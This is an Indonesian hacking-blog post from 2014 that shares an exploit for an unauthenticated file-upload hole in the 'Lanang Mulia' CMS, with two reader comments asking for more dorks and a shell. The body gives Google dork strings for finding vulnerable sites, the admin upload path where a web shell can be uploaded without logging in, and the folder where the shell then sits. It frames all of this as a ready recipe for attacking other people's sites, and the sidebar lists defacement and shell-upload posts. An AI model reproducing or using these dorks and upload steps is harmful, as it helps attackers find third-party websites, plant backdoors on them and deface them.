• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Exploit CMS Lanang Mulia Uploader Vulnerability

January 22, 2014 by Jack Wilder 2 Comments

kali ini ane mau share exploit yang ane dapet kemarin dari seortang teman di facebook. namanya Exploit Lanang Mulia Uploader Vulnerability. Bugnya hampir mirip dengan Bug Upload pada CMS Lokomedia. Setelah ane masuk ke dalamnya pun ternyata cms ini hampir sama dengan Lokomedia.
Oke langsung saja ane share exploitnya :

Exploit Title: Lanang Mulia Uploader Vulnerability
Google Dork:
intext:” Web By: lanangmulia.net”
inurl:showdetail.php?mod=
Untuk dork lain kembangkan sendiri, use your brain 😉

Exploit :
[localhost]/admin/upload_1.php
Jika belum di patch, disitu kalian bisa langsung upload shell kalian tanpa harus tamper data maupun login 😀
Nah, nanti shell akan terletak di
[localhost]/foto/namashell.php

Sekian tutorial kali ini, semoga bermanfaat .
Thanks to : BarrabravaZ

Filed Under: Uncategorized Tagged With: Exploit

Reader Interactions

Comments

  1. Anonim says

    January 22, 2014 at 7:59 am

    dorknya??

    Reply
  2. Adha Altafi says

    January 22, 2014 at 8:05 am

    shellnya mana?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

MIME Type Sniffing pada Form Upload Gambar

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

RCE pada Redis via Master-Slave Replication

Prestashop Module Blocktestimonial File Upload Auto Exploit

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Surge.sh Custom Domain or Subdomain Takeover

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Laravel PHPUnit Remote Code Execution

LinuxSec / 11 queries in 0.12 seconds